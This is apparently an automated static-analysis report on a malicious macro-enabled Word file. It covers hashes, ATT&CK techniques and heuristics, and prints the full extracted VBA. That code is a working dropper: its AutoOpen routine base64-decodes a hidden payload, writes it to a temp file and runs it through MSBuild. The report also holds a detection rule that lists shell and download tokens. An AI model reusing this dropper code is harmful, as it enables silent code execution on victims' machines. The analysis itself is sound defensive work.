Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 33f9f2d0799c3e4f…

MALICIOUS

Office (OOXML)

231.3 KB Created: 2021-08-02 00:25:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-05
MD5: 188762af92ec3cec90c6f598616848c2 SHA-1: c9df6af71935ceb96cf6781f9f2a3c738d11f349 SHA-256: 33f9f2d0799c3e4f0a67e674b401a8a34d3190c6f17940c65702e6639c7ad06a
190 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File

The sample contains VBA macros that utilize WScript.Shell and CreateObject, indicating execution of external code. The macros include functions for Base64 decoding and stream manipulation, suggesting an attempt to decode and execute a payload. The presence of an AutoOpen macro further supports the execution of malicious code upon opening the document.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set wsh = VBA.CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set BinaryStream = CreateObject("ADODB.Stream")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2665 bytes
SHA-256: b61dbc4bdd67f84029ab756061b9781864b7e4d3f38200837a9b9b7dda3fa294
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function Stream_BinaryToString(Binary)
 On Error Resume Next
 Const adTypeText = 2
 Const adTypeBinary = 1
 Dim BinaryStream 'As New Stream
 Set BinaryStream = CreateObject("ADODB.Stream")
 BinaryStream.Type = adTypeBinary
 BinaryStream.Open
 BinaryStream.Write Binary
 BinaryStream.Position = 0
 BinaryStream.Type = adTypeText
 BinaryStream.Charset = "us-ascii"
 Stream_BinaryToString = BinaryStream.ReadText
 Set BinaryStream = Nothing
End Function

Function Base64DecodeToBinary(ByVal vCode)
 On Error Resume Next
 Dim oXML, oNode
 Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
 Set oNode = oXML.CreateElement("base64")
 oNode.dataType = "bin.base64"
 oNode.Text = vCode
 Base64DecodeToBinary = oNode.nodeTypedValue
 Set oNode = Nothing
 Set oXML = Nothing
End Function

Function Base64DecodeToString(ByVal vCode)
 On Error Resume Next
 Dim oXML, oNode
 Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
 Set oNode = oXML.CreateElement("base64")
 oNode.dataType = "bin.base64"
 oNode.Text = vCode
 Base64DecodeToString = Stream_BinaryToString(oNode.nodeTypedValue)
 Set oNode = Nothing
 Set oXML = Nothing
End Function
Sub ExtractDoc(docPath)
    On Error Resume Next
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    MsgBox Base64DecodeToBinary(Base64DecodeToString(UserForm1.Label1.Caption))
    objStream.Write Base64DecodeToBinary(Base64DecodeToString(UserForm1.Label1.Caption))
    objStream.SaveToFile docPath, 2
    Set objStream = Nothing
End Sub

Sub AutoOpen()
    On Error Resume Next
    Application.Visible = False
    Dim filepath As String
    filepath = "c:\windows\temp\whatever.xml"
    ExtractDoc (filepath)
    Dim wsh As Object
    Set wsh = VBA.CreateObject("WScript.Shell")
    Dim waitOnReturn As Boolean: waitOnReturn = True
    Dim windowStyle As Integer: windowStyle = 1
    wsh.Run "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe c:\windows\temp\whatever.xml", 1, True
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{AF5FFF82-D300-4D03-AC96-CAC30C399D37}{A4CF11CA-C582-429F-9C63-DD5059693DA0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 393728 bytes
SHA-256: 59aa87a4fee89d69c0b0a6b449cd3ee8aebca9e30b8557037abd806391f0df4c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
3110 of 3373 identifiers look randomly generated (e.g. 'IjsKCQkJCXJldHVybiBvSG9FeHVQR0NTVnJnUEhn') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.